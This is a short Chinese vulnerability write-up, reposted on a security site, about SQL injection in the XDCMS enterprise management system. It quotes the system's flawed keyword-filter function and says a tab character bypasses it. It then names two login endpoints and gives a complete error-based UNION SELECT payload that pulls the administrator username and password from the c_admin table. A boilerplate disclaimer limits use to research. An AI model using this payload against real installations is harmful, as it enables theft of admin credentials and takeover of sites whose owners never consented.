XDCMS企业管理系统SQL #1~2

没穿底裤 2020年1月1日04:55:05评论424 views字数 689阅读2分17秒阅读模式
摘要

看到这个函数。[php]
function safe_html($str){if(empty($str)){return;}if (preg_match('//b select/b |/b insert/b | /b update/b | /b and/b | /b in/b | /b on/b | /b left/b |/b joins/b | /b delete/b |/%|/=|///*|/*| /b union/b |/././/|/.//| /b from/b | /b where/b | /b group/b | /binto/b |/bload_file/b


漏洞作者: roker

看到这个函数。

[php]
function safe_html($str){

if(empty($str)){return;}

if (preg_match('//b select/b |/b insert/b | /b update/b | /b and/b | /b in/b | /b on/b | /b left/b |/b joins/b | /b delete/b |/%|/=|///*|/*| /b union/b |/././/|/.//| /b from/b | /b where/b | /b group/b | /binto/b |/bload_file/b

|/boutfile/b/i',$str)){showmsg(C('error'),'-1');}

return htmlspecialchars($str, ENT_COMPAT ,'GB2312');

}
[/php]

select+tab键 就可以了嘛~
第一处

url: xxx.xxx/index.php?m=member&f=login_save

post 如下数据

[php]

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM c_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b#

[/php]

XDCMS企业管理系统SQL #1~2

 

注入到管理账号密码

第二处 index.php?m=xdcms&c=login&f=check

同第一处所示。

一样的exp。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日04:55:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XDCMS企业管理系统SQL #1~2https://cn-sec.com/archives/75663.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息